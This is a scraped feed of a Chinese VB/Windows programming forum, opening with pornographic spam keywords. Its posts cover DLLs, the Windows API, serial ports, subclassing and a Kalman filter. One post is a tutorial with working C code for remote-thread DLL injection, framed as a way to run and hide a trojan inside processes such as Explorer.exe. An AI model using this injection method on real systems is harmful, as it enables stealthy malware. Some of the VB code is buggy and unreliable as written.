亚洲中文字幕无码久久2020,亚洲成a人片在线观看中文app,亚洲日韩乱码中文无码蜜桃臀http://www.bjzhda.cnzh-cn曙海教育集團論壇http://www.bjzhda.cnRss Generator By Dvbbs.Netofficeoffice@126.comimages/logo.gif曙海教育集團論壇技術討論總結 -之- DLL和COMhttp://www.hufushizhe.com/bbs/dispbbs.asp?BoardID=77&ID=2609&Page=1wangxinxin2010-12-14 14:52:04
DLL是微軟創造的二進制級別代碼重用和應用程序管理的技術. DLL有如下這些好處:
1. 由于DLL動態加載的特性, 使得DLL模塊和應用程序主干相剝離, 便于程序的升級 -----升級某個模塊的功能只需覆蓋某個DLL就可以了, 無需重新編譯全部代碼.
2. DLL的另一個好處也來自動態加載, 因此依賴于這個模塊的其他各類應用程序不需與DLL編譯在一起, 因此省出了更多的硬盤空間. 假如使用靜態鏈接, 則每一個應用程序都需包含相應的模塊鏡像, 對磁盤的浪費是很嚴重的.
3. 更為重要的, 使用DLL還有助于節省內存. 因為系統為DLL提供了引用計數, 所有加載DLL的進程共享DLL的頁面(當然數據不能共享,數據由進程自己保存.能夠共享的是相當于代碼段的頁面),因此DLL使得內存的使用更有效.
4. 使用DLL可以實現多語言編程.例如VB的程序可以調用C++代碼實現的DLL模塊里面的函數.

DLL有兩種加載方式, 一種是隱示加載, 就是在應用程序里包含DLL編寫者提供的.h文件和編譯時產生的.lib文件. 這樣DLL將會在程序啟動時加載入進程. 可以想見, 如word這類的程序在啟動之時如此緩慢, 就是在不斷的加載各種DLL模塊.
另一種加載方式就是在程序中調用LoadLibrary函數顯示加載DLL, 然后通過調用GetProcAddress函數獲取相應函數的地址(即函數指針), 從而調用DLL內的函數. 這種做法有一個很好的優點就是不必所有的DLL都在啟動時加載, 很多DLL模塊都可以在需要使用的時候再臨時加載, 有些DLL假如沒有用到可以一直不加載. 我個人認為這是很好的用戶體驗. 我不理解的是為什么MS的各類產品沒有使用這種方式進行程序設計.或許他已經用了, 但是啟動時候必須加載的DLL項目太多?我就不再猜測了..
顯示加載的DLL需要手動卸載, 調用FreeLibrary函數卸載它.

與普通的EXE一樣, DLL也有一個進入點函數, 名字叫做DllMain, 這個函數接受三個參數, HINSTANCE hInst, DWORD fdwReason, PVOID fImpLoad
我在這里只討論第二個參數fdwReason. 它可以是4個值: DLL_PROCESS_ATTACH, DLL_PROCESS_DETACH, DLL_THREAD_ATTACH, DLL_THREAD_DETACH
分別表示DLL首次加載,DLL從進程中釋放, DLL線程的構造和終止. 其實系統為DLL提供了引用計數, DLL只加載入RAM一次, 所有進程共享DLL的各個頁面, 所以只有第一次加載會調用帶有DLL_PROCESS_ATTACH的DllMain. 但每次DLL從進程中釋放都會調用帶DLL_PROCESS_DETACH的DllMain, 這是因為進程保存了DLL里面的一些變量可能需要釋放掉.
因此DllMain可以阻止進程結束.它可以在DLL_PROCESS_DETACH消息中放一個死循環,等待所有資源都被釋放掉才退出. 如果有些資源出了問題, 就可能導致DLL無法正常退出.這就是為什么有些程序即使你去點小紅叉叉也結束不了進程的原因.這種情況可以調用TerminateProcess函數強關進程.這就是為什么通過任務管理器仍然能結束進程的原因(但是這樣做有可能丟失數據...)]]>
vb語言實現的卡爾曼濾波源程序http://www.hufushizhe.com/bbs/dispbbs.asp?BoardID=77&ID=2608&Page=1wangxinxin2010-12-14 14:47:56(沒有測試,輸出部分要配合相應的過程)

Dim num1, num2, num3
Dim a(), a1(), e() As Single
Dim alf, xgm(), p(), k1(), k2, k(), p1(), p2(), c(), c1, k3(), k4(), cc() As Single
Private Sub Command1_Click()
CommonDialog1.ShowOpen
Open CommonDialog1.FileName For Input As #1
num3 = Val(Text1.Text) + 2
num2 = Val(Text2.Text)
ReDim a(num3, num2)
For j = 1 To num3
For i = 1 To num2
Input #1, a(j, i)
Next i
Next j
Close #1

End Sub

Private Sub Command2_Click()
CommonDialog1.ShowSave
Open CommonDialog1.FileName For Append As #2

For i = 1 To num2
Print #2, cc(i, 1), cc(i, 2), cc(i, 3)
Next i

Close #2
Shell "c:\windows\notepad " & CommonDialog1.FileName
End Sub

Private Sub Command3_Click()

num1 = Val(Text1.Text) + 1
num2 = Val(Text2.Text)
num3 = Val(Text1.Text) + 2
ReDim a1(num2), e(num1, num2) As Single
ReDim xgm(num1), p(num1, num1), k1(num1), k(num1), p1(num1, num1), p2(num1, num1), c(num1), k3(num1), k4(num1), cc(num2, num1) As Single





c(1) = c(2) = c(3) = 0
r = 0.000001
alf = 10
For j = 1 To num1
For i = 1 To num2
e(j, i) = a(j, i)
a1(i) = a(num3, i)
Next i
Next j
For x = 1 To num1
xgm(x) = alf * Sqr(r / e(x, 1))
p(x, x) = xgm(x) ^ 2
Next x

For q = 1 To num2
For i = 1 To num1
k3(i) = k4(i) = 0
Next i
k2 = 0
For i = 1 To num1
For j = 1 To num1
p1(i, j) = p2(i, j) = 0
Next j
Next i
c1 = 0

For m = 1 To num1
k3(m) = 0
For n = 1 To num1
k3(m) = k3(m) + e(n, q) * p(n, m)
Next n
Next m

For m = 1 To num1
k4(m) = 0
k4(m) = k4(m) + 1000 * k3(m) * e(m, q)
Next m

For i = 1 To num1
k2 = k2 + k4(i)
Next i

For v = 1 To num1
k(v) = 0
k(v) = k3(v) * (k2 / 1000 + r) ^ -1
Next v

For i = 1 To num1
For j = 1 To 3
p1(i, j) = k(i) * e(j, q)
Next j
Next i

For l = 1 To num1
For i = 1 To num1
p2(l, i) = 0
For j = 1 To num1

p2(l, i) = 1000 * p1(l, j) * p(j, i) + p2(l, i)
Next j
Next i
Next l

For i = 1 To num1
For j = 1 To num1
p(i, j) = p(i, j) - p2(i, j) / 1000
Next j
Next i

For i = 1 To num1
c1 = c1 + e(i, q) * c(i)
Next i
For i = 1 To num1
c(i) = c(i) + k(i) * (a1(q) - c1)

Next i


For i = 1 To num1

cc(q, i) = c(i)
Next i
Next q

End Sub

Private Sub Command4_Click()
End
End Sub]]>
用vb和c語言來進行遠程線形技術http://www.hufushizhe.com/bbs/dispbbs.asp?BoardID=77&ID=2607&Page=1wangxinxin2010-12-14 14:39:24
遠程線程技術指的是通過在另一個進程中創建遠程線程的方法進入那個進程的內存地址空間。我們知道,在進程中,可以通過CreateThread函數創建線程,被創建的新線程與主線程(就是進程啟動時被同時自動建立的那個線程)共享地址空間以及其他的資源。 但是很少有人知道,通過CreateRemoteThread也同樣可以在另一個進程內創建新線程,被創建的遠程線程同樣可以共享遠程進程(是遠程進程耶!)的地址空間,所以,實際上,我們通過一個遠程線程,進入了遠程進程的內存地址空間,也就擁有了那個遠程進程相當的權限。例如在遠程進程內部啟動一個DLL木馬(與進入進程內部相比,啟動一個DLL木馬是小意思,實際上我們可以隨意篡改那個遠程進程的數據)。

  首先,我們通過OpenProcess 來打開我們試圖嵌入的進程(如果遠程進程不允許打開,那么嵌入就無法進行了,這往往是由于權限不足引起的,解決方法是通過種種途徑提升本地進程的權限) 

 hRemoteProcess = OpenProcess( PROCESS_CREATE_THREAD | file://允許遠程創建線程 
                PROCESS_VM_OPERATION | file://允許遠程VM操作 
                PROCESS_VM_WRITE,//允許遠程VM寫 
                FALSE, dwRemoteProcessId ) 

  由于我們后面需要寫入遠程進程的內存地址空間并建立遠程線程,所以需要申請足夠的權限(PROCESS_CREATE_THREAD、VM_OPERATION、VM_WRITE)。 

  然后,我們可以建立LoadLibraryW函數這個線程來啟動我們的DLL木馬,LoadLibraryW函數是在kernel32.dll中定義的,用來加載DLL文件,它只有一個參數,就是DLL文件的絕對路徑名pszLibFileName,(也就是木馬DLL的全路徑文件名),但是由于木馬DLL是在遠程進程內調用的,所以我們首先還需要將這個文件名復制到遠程地址空間:(否則遠程線程是無法讀到這個參數的) 

 file://計算DLL路徑名需要的內存空間 
 int cb = (1 + lstrlenW(pszLibFileName)) * sizeof(WCHAR); 
 file://使用VirtualAllocEx函數在遠程進程的內存地址空間分配DLL文件名緩沖區 
 pszLibFileRemote = (PWSTR) VirtualAllocEx( hRemoteProcess, NULL, cb, 
            MEM_COMMIT, PAGE_READWRITE); 
 file://使用WriteProcessMemory函數將DLL的路徑名復制到遠程進程的內存空間 
 iReturnCode = WriteProcessMemory(hRemoteProcess, 
            pszLibFileRemote, (PVOID) pszLibFileName, cb, NULL); 
 file://計算LoadLibraryW的入口地址 
 PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE) 
     GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW"); 

  萬事俱備,我們通過建立遠程線程時的地址pfnStartAddr(實際上就是LoadLibraryW的入口地址)和傳遞的參數pszLibFileRemote(實際上是我們復制過去的木馬DLL的全路徑文件名)在遠程進程內啟動我們的木馬DLL: 

 file://啟動遠程線程LoadLibraryW,通過遠程線程調用用戶的DLL文件 
 hRemoteThread = CreateRemoteThread( hRemoteProcess, NULL, 0, 
                 pfnStartAddr, pszLibFileRemote, 0, NULL); 

  至此,遠程嵌入順利完成,為了試驗我們的DLL是不是已經正常的在遠程線程運行,我編寫了以下的測試DLL: 

 BOOL APIENTRY DllMain(HANDLE hModule, DWORD reason, LPVOID lpReserved) 
   { 
    char szProcessId[64] ; 
    switch ( reason ) 
     { 
      case DLL_PROCESS_ATTACH: 
       { 
         file://獲取當前進程ID 
         _itoa ( GetCurrentProcessId(), szProcessId, 10 ); 
         MessageBox ( NULL, szProcessId, "RemoteDLL", MB_OK ); 
       } 
      default: 
      return TRUE; 
     } 
   } 

  當我使用RmtDll.exe程序將這個TestDLL.dll嵌入Explorer.exe進程后(PID=1208),該測試DLL彈出了1208字樣的確認框,同時使用PS工具也能看到 

   Process ID: 1208 
   C:WINNTExplorer.exe (0x00400000) 
   …… 
   C:TestDLL.dll (0x100000000) 
   …… 

  這證明TestDLL.dll已經在Explorer.exe進程內正確地運行了。 

  無論是使用特洛伊DLL還是使用遠程線程,都是讓木馬的核心代碼運行于別的進程的內存空間,這樣不僅能很好地隱藏自己,也能更好的保護自己。
]]>
開發語言中的VB串口通訊實例http://www.hufushizhe.com/bbs/dispbbs.asp?BoardID=77&ID=2606&Page=1wangxinxin2010-12-14 14:36:19Dim PortValue As Integer `端口號選擇1-4
Dim value As Double `當前一次取值
Dim value2 As Double `要顯示的值
Dim valueSum As Double `和
Dim numCount As Double `算平均值是的計數個數
Dim func As Integer `功能號標志1-4
Dim valueFlag As Integer
Private Sub Check1_Click()
`自動刷新 被選中則 刷新按鈕無效
If Check1.value Then
Command1.Enabled = False
Else
Command1.Enabled = True

Command1.SetFocus
End If
End Sub
Private Sub Command1_Click()
`顯示
Call display
End Sub
Private Sub Command2_Click()
valueSum = 0 `清計數和
numCount = 1 `清計數個數
Label6.Caption = Str(numCount - 1) `顯示復位
value = 0
value2 = 0
valueFlag = 0
Call display
End Sub
Private Sub Form_Activate()
numCount = 1
value = 0
valueSum = 0
PortValue = 1
Text1.Visible = False
Label6.Caption = 0
Option1(0).value = True
Option2(0).value = True
Command1.SetFocus
Label1.Caption = Format(value2 0.000000)
For i = 0 To 3
If Option2(i).value = True Then
func = i + 1
End If
Next i
Check1.value = 1
`Call ComPortOpen
End Sub
Public Sub ComPortOpen() `開串口
With MSComm1
.CommPort = PortValue `使用COM1
.Settings = 9600N81 `設置通信口參數
.InBufferSize = 40
`設置MSComm1接收緩沖區為40字節
`.OutBufferSize = 2
`設置MSComm1發送緩沖區為2字節
.InputMode = comInputModeBinary
`設置接收數據模式為二進制形式
.InputLen = 1
`設置Input 一次從接收緩沖讀取字節數為1
`.SThreshold = 1
`設置Output 一次從發送緩沖讀取字節數為1
.InBufferCount = 0 `清除接收緩沖區
`.OutBufferCount = 0 `清除發送緩沖區
`MaxW = -99
`最大值賦初值
`MinW = 99 `最小值賦初值
`w = 0
`數據個數計數器清零
.RThreshold = 1
On Error Resume Next
`設置接收一個字節產生OnComm事件
If .PortOpen = False Then
`判斷通信口是否打開
.PortOpen = True `打開通信口
If Err Then `錯誤處理
msg = MsgBox( 串口 COM PortValue 無效! vbOKOnly 警告)
Exit Sub
End If
End If
End With
`MsgBox 端口已打開
End Sub
Public Sub ComPortClose() `關串口
MSComm1.PortOpen = False
` MsgBox 端口已關閉
End Sub
Private Sub MSComm1_OnComm()
Call recive
End Sub
Private Sub Option1_Click(Index As Integer)
If MSComm1.PortOpen = True Then
Call ComPortClose
End If
PortValue = Index + 1
Call ComPortOpen
End Sub
Private Sub recive() `檢測起始位并接收數據
Dim Buffer As Variant
Dim Arr() As Byte
Dim inData(5) As Byte
Dim count As Integer
Dim temp As Byte


` MsgBox OnComm
With MSComm1

Select Case .CommEvent
`判斷MSComm1通信事件
Case comEvReceive
`收到Rthreshold個字節產生的接收事件
Buffer = .Input
Arr = Buffer

`讀取一個接收字節
` Text1.Text = Arr(0)
If Arr(0) = H1B Then
.RThreshold = 0
Do
DoEvents
Loop Until .InBufferCount >= 4

For i = 1 To 4
`count = .InBufferCount
Buffer = .Input
Arr = Buffer
inData(i) = Arr(0)
Next i
If inData(4) = HA Then
If (inData(1) Mod 64) >= 32 Then
.RThreshold = 1
Exit Sub
End If
valueFlag = 1
`0.000003814697265625
temp = inData(1) Mod 16
If temp <= 7 Then
value = inData(1) Mod 8
value = value * 256 * 256
value = value + Val(inData(2)) * 256
value = value + Val(inData(3))
value = value * 3.814697265625E-06
`Text1.Text = Format(value 0.000000)
Else
value = inData(1) Mod 8
value = value * 256 * 256
value = value + Val(inData(2)) * 256
value = value + Val(inData(3))
value = value * 3.814697265625E-06
value = 0 - value
End If
temp = inData(1) Mod 128
` test OF
If temp >= 64 Then
If value < 0 Then
value = value - 0.000004
Else
value = value + 0.000004
End If
End If
`檢測自動刷新
If Check1.value Then
`valueFlag = 1
Call display
End If
]]>
什么是APIhttp://www.hufushizhe.com/bbs/dispbbs.asp?BoardID=77&ID=2605&Page=1wangxinxin2010-12-14 14:31:43
如果你打開WINDOWS的SYSTEM文件夾,你可以發現其中有很多附加名為DLL的文件。一個DLL中包含的API函數并不只是一個,數十個,甚至是數百個。我們能都掌握它嘛?回答是否定的∶不可能掌握。但實際上,我們真的沒必要都掌握,只要重點掌握Windos系統本身自帶的API函數就可以了。但,在其中還應當拋開掉同VB本身自有的函數重復的函數。如,VB
的etAttr命令可以獲得文件屬性,SetAttr可以設置文件屬性。對API來講也有對應的函數
GetFileAttributes和SetFileAttributes,性能都差不多。如此地一算,剩下來的也就5、600個。是的,也不少。但,我可以敢跟你說,只要你熟悉地掌握100個,那么你的編程水平比現在高出至少要兩倍。盡管人們說VB和WINDOWS具有密切的關系,但我認為,API更接近
WINDOWS。如果你學會了API,首要的收獲便是對WINDOWS體系結構的認識。這個收獲是來自不易的。

如果你不依靠API會怎么樣?我可以跟你說,絕大多是高級編程書本(當然這不是書的名程叫高級而高級的,而是在一開始的《本書內容》中指明《本書的閱讀對象是具有一定VB基礎的讀者》的那些書),首先提的問題一般大都是從API開始。因此可以說,你不學API,你大概將停留在初級水平,無法往上攀登。唯一的途徑也許就是向別人求救∶我快死了,快來救救我呀,這個怎么辦,那個怎么辦?煩不煩呢?當然,現在網上好人太多(包括我在內,嘻嘻),但,你應當明白,通過此途徑,你的手中出不了好的作品。這是因為缺乏這些知識你的腦子里根本行不成一種總體的設計構思。
API文本游覽器 [返回]

很多API函數都是很長很長的。想看什么樣子嗎?如下就是作為例子的API DdeClientTransaction函數∶
Declare Function DdeClientTransaction Lib "user32" (pData As Byte, ByVal cbData As Long, ByVal hConv As Long, ByVal hszItem As Long, ByVal wFmt As Long, ByVal wType As Long, ByVal dwTimeout As Long, pdwResult As Long) As Long
哇!這么長?如果你從來沒有接觸過API,我想你肯定被嚇住了。你也許考慮,該不該繼續學下去。不過不要擔心,幸運的是Microsoft的設計家們為我們提供了有用的工具,這便是API
文本查看器。

通過API文本查看器,我們可以方便地查找程序所需要的函數聲明、結構類型和常數,然后將它復制到剪貼板,最后再粘貼到VB程序的代碼段中。在大多數情況下,只要我們確定了程序所需要的函數、結構和常數這三個方面后,就可以通過對API文本游覽器的以上操作將他們加入到程序段中,從而程序中可以使用這些函數了。這些是學習API最基本的常識問題,它遠遠占不到API的龐大的體系內容。今后我們把精力浪費(這絕不是浪費)在哪里呢?那就是∶
什么時候使用什么函數,什么時候使用什么結構類型,什么時候使用什么常數。
API函數聲明 [返回]

讓我們回想一下。在VB中,如何聲明函數呢?我想,如果你正在看此文,那么你絕對能夠回答得出這個問題。以下便是你應該很熟悉的函數聲明∶
Function SetFocus (ByVal hwnd As Long) As Long
即,這行代碼定義了名為SetFocus的函數,此函數具有一個Long型數據類型的參數,并按值傳遞(ByVal),函數執行后將返回一個Long型數據。
API函數的聲明也很類似,如,API中的SetFocus 函數是這樣寫的∶

Declare Function SetFocus Lib "user32" Alias "SetFocus" (ByVal hwnd As Long) As Long
有點復雜了一些。是的,是復雜了點。但我可以告訴你,除了這些多出來的部分,其他部分還是和你以前學到的東西是一樣的。函數在程序中的調用也是一樣。如:
Dim dl As Long
dl&=SetFoucs(Form1.Hwnd)
但,一點是清楚的。它不象你自己寫的程序那樣能夠看到里面的運行機理,也不像VB
自帶的函數那樣,能夠從VB的聯機幫助中查到其用法。唯一的方法就是去學、查VB以外的資料。

Declare 語句用于在模塊級別中聲明對動態鏈接庫 (DLL) 中外部過程的引用。對此,你只要記住任何API函數聲明都必須寫這個語句就可以了。
Iib 指明包含所聲明過程或函數的動態鏈接庫或代碼資源。也就是說,它說明的是,函數或過程從何而來的問題。
如在上例中,SetFocus Lib "user32"說明 函數 SetFocus 來自 user32.dll文件。主要的dll動態連接庫文件有∶
user32.dll Windows管理。生成和管理應用程序的用戶接口。

GDI32.dll 圖形設備接口。產生Windows設備的圖形輸出
Kernel32.dll 系統服務。訪問操作系統的計算機資源。
注意,當DLL文件不在Windows或System文件夾中的時候,必須在函數中說明其出處(
路徑)。如,SetFocus Lib "c:\Mydll\user32"
函數聲明中的Alias 是可選的。表示將被調用的過程在動態鏈接庫 (DLL) 中還有另外的名稱(別名)。如,Alias "SetFocus" ,說明SetFocus函數在User32.dll中的另外一個名稱是,
SetFocus。怎么兩個名都一樣呢?當然,也可以是不同的。在很多情況下,Alias說明的函數名,即別名最后一個字符經常是字符A,如SetWindowsText函數的另一個名稱是
SetWindowsTextA,表示為Alias "SetWindowsTextA"。這個A只不過是設計家們的習慣的命名約定,表示函數屬于ANSI版本。

那么,別名究竟有什么用途呢?從理論上講,別名提供了用另一個名子調用API的函數方法。如果你指明了別名,那么 盡管我們按Declare語句后面的函數來調用該函數,但在函數的實際調用上是以別名作為首要選擇的。如,以下兩個函數(Function,ABCD)聲明都是有效的,他們調用的是同一個 SetFocus函數∶
Declare Function SetFocus Lib "user32" "SetFocus" (ByVal hwnd As Long) As Long
Declare ABCD SetFocus Lib "user32" Alias "SetFocus" (ByVal hwnd As Long) As Long

需要注意的是,選用Alias的時候,應注意別名的大小寫;如果不選用Alias 時的時候,函數名必須注意大小寫,而且不能改動。當然,在很多情況下,由于函數聲明是直接從API
文本游覽器中拷貝過來的,所以這種錯誤的發生機會是很少的,但您有必要知道這一點。
最后提醒你一句,API聲明(包括結構、常數)必須放在窗體或模塊的"通用(General Declarations)段。
數據類型與"類型安全" [返回]

API函數中使用的數據類型基本上和VB中的一樣。但作為WIN32的API函數中,不存在Integer
數據類型。另外一點是在API函數中看不到Boolean數據類型。 Variant數據類型在API函數中是以Any的形式出現,如Data As Any。盡管其含義是允許任意參數類型作為一個該API函數的參數傳遞,但這樣做存在一定的缺點。其原因是,這將會使得對目標參數的所有類型檢查都會被關閉。這自然會給各種類型的參數調用帶來了產生錯誤的機會。

為了強制執行嚴格的類型檢查,并避免上面提到的問題,一個辦法是在函數里使用上面提到到Alias技術。如對API函數 GetDIBits 可進行另外一種聲明方法。如下∶
GetDIBits函數的原型∶
Public Declare Function GetDIBits Lib "gdi32" Alias "GetDIBits" (ByVal aHDC As Long, ByVal hBitmap As Long, ByVal nStartScan As Long, ByVal nNumScans As Long, lpBits As Any, lpBI As BITMAPINFO, ByVal wUsage As Long) As Long
GetDIBits函數的改型∶

Public Declare Function GetDIBitsLong Lib "gdi32" Alias "GetDIBits" (ByVal aHDC As Long, ByVal hBitmap As Long, ByVal nStartScan As Long, ByVal nNumScans As Long, lpBits As Long, lpBI As BITMAPINFO, ByVal wUsage As Long) As Long
通過本課程前面所學到的知識,我們已經可以得知原型 GetDIBits函數也好,改型 GetDIBitsLong函數也好,實際將調用的都是Alias所指定的 GetDIBits原函數。但你應當看到,兩者的區別在于,我們在改型的函數中強制指定lpBits參數為Long形。這樣就會使得函數調用中發生的錯誤機率減少到了最小。這種方法叫做"安全類型"聲明。

API函數中經常看到的數據類型有∶Long,String,Byte,Any....(也就這些吧。)
常 數 [返回]

對于API常數來講,沒有什么太特別的學問。請看VB中的以下代碼∶
Msg = MsgBox("您好", vbOKCancel)
我們知道, vbOKCancel這個常數的值等于1。對上面的代碼我們完全可以這樣寫,而不會影響代碼的功能∶
Msg = MsgBox("您好", 1)
但你大概不太愿意選擇后一種,因為這會使得看懂代碼費勁起來。這種方法也被API采取了。只是API常數必須在事情之前做好初始化聲明VB本身是看不懂的。其內容仍然來自與API
文本游覽器。具體形式如下等等∶

Public Const ABM_ACTIVATE = &H6
Public Const RIGHT_CTRL_PRESSED = &H4
Public Const RPC_E_SERVER_DIED = &H80010007
Private Const RPC_S_CALL_FAILED_DNE = 1727&
在常數的初始化中,有些程序使用Global,如Global Const ABM_ACTIVATE = &H6,但我認為Public完全可以代替它。過去我也用過Global,但現在不大用了。一會兒用這個,一會兒用那個,各程序之間不能保持一致性了,起碼看起來別扭。
結 構 [返回]

結構是C和C++語言中的說法。在VB中一般稱為自定義數據類型。想必很多朋友都已經認識它。在API領域里,我更喜歡把它叫做結構,因為API各種結構類型根本不是我定義(
自定義)的。
在VB中,API結構同樣由TYPE.......END TYPE語句來定義。如,在API中,點(Point)結構的定義方法如下:
Public Type POINTAPI
X As Long '點在X坐標(橫坐標)上的坐標值

Y As Long '點在Y坐標(縱坐標)上的坐標值
End Type
又如,API中矩形(Rect)結構的定義如下∶
Public Type RECT
Left As Long '矩形左上角的X坐標
Top As Long '矩形左上角的Y坐標
Right As Long '矩形右下角的X坐標
Bottom As Long '矩形右下角的Y坐標

End Type
這些內容同樣可以從API文本游覽器中拷貝過來。這些結構中的變量名可隨意改動,而不會影響結構本身。也就是說,這些成員變量都是虛擬的。如,POINTAPI結構可改為如下∶
Public Type POINTAPI
MyX As Long '點在X坐標(橫坐標)上的坐標值
MyY As Long '點在Y坐標(縱坐標)上的坐標值
End Type
不過,一般來講,是沒有這種必要的。結構本身是一種數據類型,因此,使用時必須聲明具體變量為該結構型,才能在程序中真正使用到該結構。結構的聲明方法和其他數據的聲明方法一樣,如,以下語句把變MyPoint聲明為POINTAPI結構類型∶

MyPoint As POINTAPI
引用結構中的成員變量也十分簡單,在結構名后面加上一個".",然后緊接著寫要引用的成員變量即可。這很象VB中的引用一個對象的某個屬性。如,假如我們把上面已經聲明的MyPoint結構中的X變量的值賦給變量Temp&
則代碼如下∶
Temp&=MyPoint.X
但,特別注意的是,你千萬不要認為上例中的MyPoint是一個值。它不是值,而是地址(
指針)。值和地址是完全不同的概念。結構要求按引用傳遞給WINDOWS函數,即所有API
函數中,結構都是按ByRef傳遞的(在Declare語句 中ByRef是默認型)。對于結構的傳遞,你不要試圖采用ByVal,你將一無所獲。由于結構名實際上就是指向這個結構的指針(這個結構的首地址),所以,你也就傳送特定的結構名就可以了(參見小結,我用紅色字體來突出了這種傳遞方式)。

由于結構傳送的是指針,所以函數將直接對結構進行讀寫操作。這種特性很適合于把函數執行的結果裝載在結構之中。
小 結 [返回]

以下的程序是為了總結本課中學到的內容而給出的。啟動VB,新建一個項目,添加一個命令按鈕,并把下面的代碼拷貝到代碼段中,運行它。

Private Declare Function GetCursorPos Lib "user32" (lpPoint As POINTAPI) As Long
Private Type POINTAPI '定義點(Point)結構
X As Long '點在X坐標(橫坐標)上的坐標值
Y As Long '點在Y坐標(縱坐標)上的坐標值
End Type
Sub PrintCursorPos( )
Dim dl AS Long
Dim MyPoint As POINTAPI
dl&= GetCursorPos(MyPoint) '調用函數,獲取屏幕鼠標坐標

Debug.Print "X=" & Str(MyPoint.X) & " and " & "Y=" & Str(MyPoint.Y)
End Sub
Private Sub Command1_Click()
PrintCursorPos

End Sub

輸出結果為(每次運行都可能得到不同的結果,這得由函數調用時鼠標指針在屏幕中所處的位置而決定)∶
X= 240 and Y= 151

程序中,GetCursorPos函數用來獲取鼠標指針在屏幕上的位置。

以上例子中,你可以發現,以參數傳遞的MyPpint結構的內容在函數調用后發生了實質性變化。這是由于結構是按ByRef傳遞的原因。
]]>
vb編程語言?學習vb語言編程需要有什么基礎?http://www.hufushizhe.com/bbs/dispbbs.asp?BoardID=77&ID=2604&Page=1wangxinxin2010-12-14 14:21:08
1、VB在編程語言中屬于十分好學的,BASIC語言在設計之初就是為初學者準備的

2、26個字母和打字肯定得會啊~~如果會英語的話,學起來會更簡單,但是不會也無妨;需要一定的電腦基礎,以理解其中的一些術語

3、如果你對電腦并不精通,或之前沒有編程經驗,建議買《Visual Basic 6程序設計與應用教程》清華大學出版社,許慶芳、翁婉真著

如果學過其它程序語言,或者你的理解能力很強,建議買《零基礎學Visual Basic》斯圖巴琴、楊利潤等著

學習VB一段時間之后,建議買《Visual Basic開發技術大全》明日科技著,里面內容很全,但不要作為入門教材!!

4、樓上寫的很詳細,這里就不再說了。

5、有助于。因為編程當中,各種語言的算法在大致上一樣。但學VB對學習C的幫助與JAVA、C++、C#、PHP等現在很流行的語言相比,是很小的;因為VB的語法和C大不一樣,而前面說的語言要么是C派生的,要么就是其語法與C相似。
有誰懂VB編程語言啊
vb編程語言我這有個題目.懂的幫個忙啊.偶是個初學者哈.
針對command.每按一次按鈕,文本框的高就會增加10.寬度增加15.字號增加2.
Private Sub Command1_Click()
Text1.Height = Text1.Height + 10 www.oustudy.com
Text1.Width = Text1.Width + 15
End Sub

添加一個按鈕和一個文本框,并修改其為多行顯示
為按鈕添加以下事件方法
Private Sub Command1_Click()
Text1.Height = Text1.Height + 10 * 15
Text1.Width = Text1.Width + 10 * 15
Text1.FontSize = Text1.FontSize + 2
End Sub
]]>
VB中子分類技術實例應用http://www.hufushizhe.com/bbs/dispbbs.asp?BoardID=77&ID=2603&Page=1wangxinxin2010-12-14 14:19:11子分類技術的原理:要先取得原先Window Procedure所在的地址,將之記錄起來,接著設定所有的消息都先轉到我們所寫的消息處理過程上來,我們過濾傳過來的消息,尋找特定的消息進行處理,其余的送回系統,由系統決定如何處理。等到我們不需要再處理這些特定的消息時,便取消消息的截取,即中止子分類過程。它一般需要三個過程:開始截取,消息處理,中止截取. 
  程序需要一個模塊,在模塊中聲明如下: 
  ’api函數Declare Function SetWindowLong Lib "user32" Alias "SetWindowLongA" _ 
  (ByVal hwnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long)

A s Long Declare Function GetWindowLong Lib "user32" Alias "GetWindowLongA" _ 
  (ByVal hwnd As Long, ByVal nIndex As Long) As Long Declare Function

CallWindowProc Lib "user32" Alias "CallWindowProcA" _ 
  (ByVal lpPrevWndFunc As Long, ByVal hwnd As Long, ByVal Msg As Long, _ 
  ByVal wParam As Long, ByVal lParam As Long) As Long 
  ’定義常數Public Const GWL_WNDPROC = (-4) Public Const WM_MOUSEMOVE = &H200 Public Const WM_RBUTTONDOWN = &H204 
  ’全局變量,存放控件標志性數據Public preWinProc As Long 
  ’本函數就是用來接收子分類時截取的消息的Public Function wndproc(ByVal hwnd As Long, ByVal Msg As Long, _ 
  ByVal wParam As Long, ByVal lParam As Long) As 
  Long 
  ’截取下來的消息存放在msg參數中. 
  if msg=WM_RBUTTONDOWN then 
  ’檢測到鼠標右擊消息,這里就可以加入我們的處理代碼如: 
  msgbox "你好,鼠標右擊消息!" 
  ’需要注意,如果這兒不加入任何代碼,則相當于吃掉了這條消息. else 
  ’如果我們不是我們需要處理的消息,則將之送回原來的程序. 
  wndproc = CallWindowProc(preWinProc, hwnd, Msg, wParam, lParam) endif End Function 
’以下代碼在窗體中: ’本例以截取一個combobox控件的消息為例,假設該’控件的名字是:comb1 Private Sub subclass() Dim ret As Long 
  ’記錄Window Procedure的地址 
  preWinProc = GetWindowLong(comb1.hwnd, GWL_WNDPROC)

]]>
VB軟件防破解設計技術初探 文檔 + 全部源碼http://www.hufushizhe.com/bbs/dispbbs.asp?BoardID=77&ID=2602&Page=1wangxinxin2010-12-14 14:17:46VB反破解最好的教程  申精加申¥[/font]
[font=黑體][/font]
[font=黑體][attach]7211[/attach][/font]
[font=黑體]
用VB開發商業軟件的朋友一定要看的啦~
3個DOC文檔 & 全部源碼 收集整理方便下載.
我用金山卡吧殺毒過 不放心的下載后再殺.
[/font]
[font=黑體][/font]
[font=黑體][/font]
[font=黑體][/font]]]>
掌握開發的武器-語言http://www.hufushizhe.com/bbs/dispbbs.asp?BoardID=77&ID=2601&Page=1wangxinxin2010-12-14 14:11:41隨首電腦的普及,電腦語言也跟首一塊開始普及。在這之前電腦語言一直是科學家手中的神秘之物。它經過不斷的發展和進化才變成我們現在所看見的樣子,而在早期的時候,語言基本上都很繁雜很難接受,語言的種類也很多,其中有相當一部分語言已經淘汰了,只有資深的程序員還能記得它們的名字。

